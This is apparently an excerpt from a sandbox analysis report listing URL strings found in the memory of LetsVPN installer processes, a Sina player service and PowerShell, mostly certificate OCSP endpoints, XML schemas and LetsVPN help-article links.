              Source: sinaplayer_service.exe, sinaplayer_service.exe, 00000011.00000000.2194495850.000000000039D000.00000002.00000001.01000000.0000000A.sdmp, sinaplayer_service.exe, 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://log.v.iask.com/n.gif?app=pcClient&type=crash&clientType=0&machineCode=
              Source: LetsPRO.exeString found in binary or memory: http://logging.apache.org/log4ne
              Source: letsvpn-latest.exe, 00000013.00000003.2515524419.000000000283C000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 00000036.00000002.2776876574.0000000005882000.00000002.00000001.01000000.0000001B.sdmpString found in binary or memory: http://logging.apache.org/log4net/release/faq.html#trouble-EventLog
              Source: letsvpn-latest.exe, 00000013.00000000.2210844280.000000000040A000.00000008.00000001.01000000.0000000E.sdmp, letsvpn-latest.exe, 00000013.00000003.2753842914.00000000005F2000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000002.2829672097.000000000040A000.00000004.00000001.01000000.0000000E.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
              Source: powershell.exe, 00000018.00000002.2667384092.00000000059BA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
              Source: letsvpn-latest.exe, 00000013.00000003.2322499057.000000000536F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
              Source: letsvpn-latest.exe, 00000013.00000003.2322499057.000000000536F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
              Source: letsvpn-latest.exe, 00000013.00000003.2322499057.000000000536F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0L
              Source: letsVPN.exe, 00000000.00000003.2153770887.00000000042F1000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2409548390.000000000283C000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2502090326.0000000002834000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2457643638.0000000002837000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2379837248.0000000002839000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2473035374.000000000536F000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2374450534.0000000002835000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2456549452.000000000283D000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2447928551.0000000002836000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2430018462.0000000002834000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2407310504.0000000002835000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2479940327.0000000002830000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2405166479.0000000002833000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2349540306.000000000283E000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2450800021.0000000002830000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2375810206.000000000283D000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2438985801.0000000002838000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2500731029.000000000283D000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 
00000013.00000003.2474765747.0000000002832000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2535561540.0000000002835000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2538895863.0000000002831000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
              Source: letsVPN.exe, 00000000.00000003.2153770887.00000000042F1000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2409548390.000000000283C000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2502090326.0000000002834000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2457643638.0000000002837000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2379837248.0000000002839000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2473035374.000000000536F000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2374450534.0000000002835000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2456549452.000000000283D000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2447928551.0000000002836000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2430018462.0000000002834000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2407310504.0000000002835000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2479940327.0000000002830000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2405166479.0000000002833000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2349540306.000000000283E000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2450800021.0000000002830000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2375810206.000000000283D000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2438985801.0000000002838000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2500731029.000000000283D000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 
00000013.00000003.2474765747.0000000002832000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2535561540.0000000002835000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2538895863.0000000002831000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.globalsign.com/codesigningrootr450F
              Source: letsVPN.exe, 00000000.00000003.2153770887.00000000042F1000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2409548390.000000000283C000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2502090326.0000000002834000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2457643638.0000000002837000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2379837248.0000000002839000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2473035374.000000000536F000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2374450534.0000000002835000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2456549452.000000000283D000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2447928551.0000000002836000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2430018462.0000000002834000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2407310504.0000000002835000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2479940327.0000000002830000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2405166479.0000000002833000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2349540306.000000000283E000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2450800021.0000000002830000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2375810206.000000000283D000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2438985801.0000000002838000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2500731029.000000000283D000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 
00000013.00000003.2474765747.0000000002832000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2535561540.0000000002835000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2538895863.0000000002831000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.globalsign.com/gsgccr45codesignca20200V
              Source: letsVPN.exe, 00000000.00000003.2153770887.00000000042F1000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2409548390.000000000283C000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2502090326.0000000002834000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2457643638.0000000002837000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2379837248.0000000002839000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2473035374.000000000536F000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2374450534.0000000002835000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2456549452.000000000283D000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2447928551.0000000002836000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2430018462.0000000002834000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2407310504.0000000002835000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2479940327.0000000002830000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2405166479.0000000002833000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2349540306.000000000283E000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2450800021.0000000002830000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2375810206.000000000283D000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2438985801.0000000002838000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2500731029.000000000283D000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 
00000013.00000003.2474765747.0000000002832000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2535561540.0000000002835000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2538895863.0000000002831000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp2.globalsign.com/rootr606
              Source: powershell.exe, 00000018.00000002.2664706128.0000000004AA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
              Source: sinaplayer_service.exeString found in binary or memory: http://rcd.video.sina.com.cn/realtime_pcdesktop
              Source: sinaplayer_service.exe, sinaplayer_service.exe, 00000011.00000000.2194495850.000000000039D000.00000002.00000001.01000000.0000000A.sdmp, sinaplayer_service.exe, 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://rcd.video.sina.com.cn/realtime_pcdesktop?app=pcClient&type=crash&clientType=0&machineCode=
              Source: sinaplayer_service.exe, 00000011.00000000.2194495850.000000000039D000.00000002.00000001.01000000.0000000A.sdmp, sinaplayer_service.exe, 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://rcd.video.sina.com.cn/realtime_pcdesktop?app=pcClient&type=crash&clientType=0&machineCode=htt
              Source: sinaplayer_service.exe, 00000011.00000000.2194495850.000000000039D000.00000002.00000001.01000000.0000000A.sdmp, sinaplayer_service.exe, 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://rcd.video.sina.com.cn/realtime_pcdesktopcrash_checkpoint.txtmax-reportsno-windowreporterdumps
              Source: letsvpn-latest.exe, 00000013.00000003.2329176650.000000000283E000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2347509564.0000000002830000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 00000036.00000000.2754838930.00000000009A2000.00000002.00000001.01000000.00000018.sdmpString found in binary or memory: http://schemas.fontawesome.io/icons/
              Source: letsvpn-latest.exe, 00000013.00000003.2516877779.0000000002839000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/claims/EmailAddressNhttp://schemas.xmlsoap.org/claims/GroupJhttp://schema
              Source: powershell.exe, 00000018.00000002.2664706128.0000000004AA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
              Source: letsvpn-latest.exe, 00000013.00000003.2516877779.0000000002839000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
              Source: letsvpn-latest.exe, 00000013.00000003.2516877779.0000000002839000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressingzhttp://docs.oasis-open.org/ws-sx/ws-secureconversat
              Source: letsvpn-latest.exe, 00000013.00000003.2516877779.0000000002839000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/mex
              Source: letsvpn-latest.exe, 00000013.00000003.2516877779.0000000002839000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/policy
              Source: letsvpn-latest.exe, 00000013.00000003.2516877779.0000000002839000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/transfer/Getthttp://schemas.xmlsoap.org/ws/2004/09/transfer/Ge
              Source: letsvpn-latest.exe, 00000013.00000003.2516877779.0000000002839000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc
              Source: letsvpn-latest.exe, 00000013.00000003.2516877779.0000000002839000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1
              Source: letsvpn-latest.exe, 00000013.00000003.2516877779.0000000002839000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/sct
              Source: letsvpn-latest.exe, 00000013.00000003.2516877779.0000000002839000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/scXhttp://schemas.xmlsoap.org/ws/2005/02/sc/sct
              Source: letsvpn-latest.exe, 00000013.00000003.2516877779.0000000002839000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
              Source: letsvpn-latest.exe, 00000013.00000003.2516877779.0000000002839000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/CancelT
              Source: letsvpn-latest.exe, 00000013.00000003.2516877779.0000000002839000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/IssueT
              Source: letsvpn-latest.exe, 00000013.00000003.2516877779.0000000002839000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issuelhttp://schemas.xmlsoap.org/ws/2005/02/trust/RS
              Source: letsvpn-latest.exe, 00000013.00000003.2516877779.0000000002839000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/RenewT
              Source: letsvpn-latest.exe, 00000013.00000003.2516877779.0000000002839000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/ValidateT
              Source: letsvpn-latest.exe, 00000013.00000003.2516877779.0000000002839000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Cancel
              Source: letsvpn-latest.exe, 00000013.00000003.2516877779.0000000002839000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/CancelT
              Source: letsvpn-latest.exe, 00000013.00000003.2516877779.0000000002839000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Cancelmhttp://schemas.xmlsoap.org/ws/2005/02/trust/
              Source: letsvpn-latest.exe, 00000013.00000003.2533198985.000000000536F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://intercom.help/letsvpn-world/en/articles/2830282-%D0%BE%D0%B1%D1%80%D0%B0%D1%82%D0%B8%D1%82%D
              Source: letsvpn-latest.exe, 00000013.00000003.2347509564.0000000002830000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 00000036.00000000.2754838930.00000000009A2000.00000002.00000001.01000000.00000018.sdmpString found in binary or memory: https://intercom.help/letsvpn-world/en/articles/2830420-special-settings-for-killer-networking-produ
              Source: letsvpn-latest.exe, 00000013.00000003.2541965114.0000000002835000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2545793260.0000000002839000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2543452892.0000000002839000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2547235737.0000000002831000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2546517065.000000000283B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://intercom.help/letsvpn-world/en/articles/2907458-%E6%8F%90%E7%A4%BA%E7%BB%91%E5%AE%9A%E8%AE%B
              Source: letsvpn-latest.exe, 00000013.00000003.2541965114.0000000002835000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2545793260.0000000002839000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2543452892.0000000002839000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2347509564.0000000002830000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2547235737.0000000002831000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2546517065.000000000283B000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 00000036.00000000.2754838930.00000000009A2000.00000002.00000001.01000000.00000018.sdmpString found in binary or memory: https://intercom.help/letsvpn-world/en/articles/2907649-%E9%80%9A%E8%BF%87%E7%94%B3%E8%BF%B0%E6%89%B
              Source: letsvpn-latest.exe, 00000013.00000003.2533198985.000000000536F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://intercom.help/letsvpn-world/en/articles/2919829-%D0%BA%D0%B0%D0%BA-%D0%BF%D0%BE%D0%BB%D1%83%
              Source: letsvpn-latest.exe, 00000013.00000003.2533198985.000000000536F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://intercom.help/letsvpn-world/en/articles/2922442-%D1%87%D1%82%D0%BE-%D0%B4%D0%B5%D0%BB%D0%B0%
              Source: letsvpn-latest.exe, 00000013.00000003.2533198985.000000000536F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://intercom.help/letsvpn-world/en/articles/2923401-%D0%BA%D0%B0%D0%BA-%D0%BF%D0%BE%D0%B6%D0%B0%
              Source: letsvpn-latest.exe, 00000013.00000003.2347509564.0000000002830000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 00000036.00000000.2754838930.00000000009A2000.00000002.00000001.01000000.00000018.sdmpString found in binary or memory: https://intercom.help/letsvpn-world/en/articles/2925752-how-to-download-letsvpn
              Source: letsvpn-latest.exe, 00000013.00000003.2347509564.0000000002830000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 00000036.00000000.2754838930.00000000009A2000.00000002.00000001.01000000.00000018.sdmpString found in binary or memory: https://intercom.help/letsvpn-world/en/articles/2926044-what-if-i-reached-maximum-connection-limit
              Source: letsvpn-latest.exe, 00000013.00000003.2347509564.0000000002830000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 00000036.00000000.2754838930.00000000009A2000.00000002.00000001.01000000.00000018.sdmpString found in binary or memory: https://intercom.help/letsvpn-world/en/articles/2926062-recover-my-letsvpn-account
              Source: letsvpn-latest.exe, 00000013.00000003.2541965114.0000000002835000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2545793260.0000000002839000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2543452892.0000000002839000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2547235737.0000000002831000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2546517065.000000000283B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://intercom.help/letsvpn-world/en/articles/3076586-ipv6-%E7%BD%91%E7%BB%9C%E5%8D%8F%E8%AE%AE%E9
              Source: letsvpn-latest.exe, 00000013.00000003.2347509564.0000000002830000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 00000036.00000000.2754838930.00000000009A2000.00000002.00000001.01000000.00000018.sdmpString found in binary or memory: https://intercom.help/letsvpn-world/en/articles/3081101-adjust-the-settings-for-ipv6
              Source: letsvpn-latest.exe, 00000013.00000003.2533198985.000000000536F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://intercom.help/letsvpn-world/en/articles/3083439-%d1%87%d1%82%d0%be-%d0%b4%d0%b5%d0%bb%d0%b0%
              Source: letsvpn-latest.exe, 00000013.00000003.2533198985.000000000536F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://intercom.help/letsvpn-world/en/articles/3083562-%D1%81%D0%BF%D0%B5%D1%86%D0%B8%D0%B0%D0%BB%D
              Source: letsvpn-latest.exe, 00000013.00000003.2541965114.0000000002835000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2545793260.0000000002839000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2543452892.0000000002839000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2547235737.0000000002831000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2546517065.000000000283B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://intercom.help/letsvpn-world/en/articles/3130411-smartbyte-%E8%BD%AF%E4%BB%B6%E9%9C%80%E8%A6%
              Source: letsvpn-latest.exe, 00000013.00000003.2347509564.0000000002830000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 00000036.00000000.2754838930.00000000009A2000.00000002.00000001.01000000.00000018.sdmpString found in binary or memory: https://intercom.help/letsvpn-world/en/articles/3401886-special-settings-for-smartbyte
              Source: letsvpn-latest.exe, 00000013.00000003.2541965114.0000000002835000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2545793260.0000000002839000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2543452892.0000000002839000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2547235737.0000000002831000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2546517065.000000000283B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://intercom.help/letsvpn-world/en/articles/3706909-%E8%B4%A6%E6%88%B7%E7%B3%BB%E7%BB%9F%E6%97%A
              Source: letsvpn-latest.exe, 00000013.00000003.2347509564.0000000002830000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 00000036.00000000.2754838930.00000000009A2000.00000002.00000001.01000000.00000018.sdmpString found in binary or memory: https://intercom.help/letsvpn-world/en/articles/3710603-about-logging-in-out-anomalies
              Source: letsvpn-latest.exe, 00000013.00000003.2533198985.000000000536F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://intercom.help/letsvpn-world/en/articles/3710827-%D0%B7%D0%B0%D1%8F%D0%B2%D0%BB%D0%B5%D0%BD%D
              Source: letsvpn-latest.exe, 00000013.00000003.2541965114.0000000002835000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2545793260.0000000002839000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2543452892.0000000002839000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2547235737.0000000002831000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2546517065.000000000283B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://intercom.help/letsvpn-world/en/articles/8259671-expressconnect-%E6%9C%8D%E5%8A%A1%E9%9C%80%E
              Source: letsvpn-latest.exe, 00000013.00000003.2541965114.0000000002835000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2545793260.0000000002839000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2543452892.0000000002839000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2547235737.0000000002831000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2546517065.000000000283B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://intercom.help/letsvpn-world/en/articles/8260054-killer-%E7%BD%91%E5%8D%A1%E6%9C%8D%E5%8A%A1%
              Source: letsvpn-latest.exe, 00000013.00000003.2541965114.0000000002835000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2545793260.0000000002839000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2543452892.0000000002839000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2547235737.0000000002831000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2546517065.000000000283B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://intercom.help/letsvpn-world/en/articles/8260070-intel-connectivity-service-%E9%9C%80%E8%A6%8
              Source: letsvpn-latest.exe, 00000013.00000003.2541965114.0000000002835000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2545793260.0000000002839000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2543452892.0000000002839000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2547235737.0000000002831000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2546517065.000000000283B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://intercom.help/letsvpn-world/en/articles/8260083-host-network-service-%E9%9C%80%E8%A6%81%E7%8
              Source: letsvpn-latest.exe, 00000013.00000003.2347509564.0000000002830000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 00000036.00000000.2754838930.00000000009A2000.00000002.00000001.01000000.00000018.sdmpString found in binary or memory: https://intercom.help/letsvpn-world/en/articles/8262690-special-settings-for-intel-connectivity-serv
              Source: letsvpn-latest.exe, 00000013.00000003.2347509564.0000000002830000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 00000036.00000000.2754838930.00000000009A2000.00000002.00000001.01000000.00000018.sdmpString found in binary or memory: https://intercom.help/letsvpn-world/en/articles/8262720-special-settings-for-host-network-service
              Source: letsvpn-latest.exe, 00000013.00000003.2347509564.0000000002830000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 00000036.00000000.2754838930.00000000009A2000.00000002.00000001.01000000.00000018.sdmpString found in binary or memory: https://intercom.help/letsvpn-world/en/articles/8262786-special-settings-for-expressconnect
              Source: letsvpn-latest.exe, 00000013.00000003.2347509564.0000000002830000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 00000036.00000000.2754838930.00000000009A2000.00000002.00000001.01000000.00000018.sdmpString found in binary or memory: https://intercom.help/letsvpn-world/en/articles/8262801-special-settings-for-killer-network-service
              Source: letsvpn-latest.exe, 00000013.00000003.2533198985.000000000536F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://intercom.help/letsvpn-world/en/articles/8262818-%D1%81%D0%BF%D0%B5%D1%86%D0%B8%D0%B0%D0%BB%D
              Source: letsvpn-latest.exe, 00000013.00000003.2533198985.000000000536F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://intercom.help/letsvpn-world/en/articles/8262867-%D1%81%D0%BF%D0%B5%D1%86%D0%B8%D0%B0%D0%BB%D
              Source: letsvpn-latest.exe, 00000013.00000003.2533198985.000000000536F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://intercom.help/letsvpn-world/en/articles/8262897-%D1%81%D0%BF%D0%B5%D1%86%D0%B8%D0%B0%D0%BB%D
              Source: letsvpn-latest.exe, 00000013.00000003.2533198985.000000000536F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://intercom.help/letsvpn-world/en/articles/8262909-%D1%81%D0%BF%D0%B5%D1%86%D0%B8%D0%B0%D0%BB%D
